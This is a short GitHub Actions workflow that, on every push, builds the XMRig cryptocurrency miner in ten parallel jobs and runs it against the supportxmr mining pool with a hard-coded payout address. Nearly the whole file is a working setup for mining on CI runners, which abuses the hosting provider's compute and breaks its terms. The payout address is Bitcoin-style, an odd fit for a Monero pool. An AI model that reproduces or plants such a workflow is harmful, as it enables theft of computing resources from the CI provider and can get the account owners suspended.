name: XMRig Mining

on: [push]

jobs:
  mine:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        run: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
    steps:
    - name: Checkout repository
      uses: actions/checkout@v2

    - name: Install dependencies
      run: sudo apt-get update && sudo apt-get install -y git build-essential cmake libuv1-dev libssl-dev libhwloc-dev

    - name: Clone XMRig repository
      run: git clone https://github.com/xmrig/xmrig.git

    - name: Build XMRig
      run: |
        mkdir xmrig/build
        cd xmrig/build
        cmake ..
        make

    - name: Run XMRig
      run: |
        cd xmrig/build
        ./xmrig -o pool.supportxmr.com:443 -u bc1q9fz799u2gw5ycfkatz8w8npt3enht2f39md9jn -k --tls
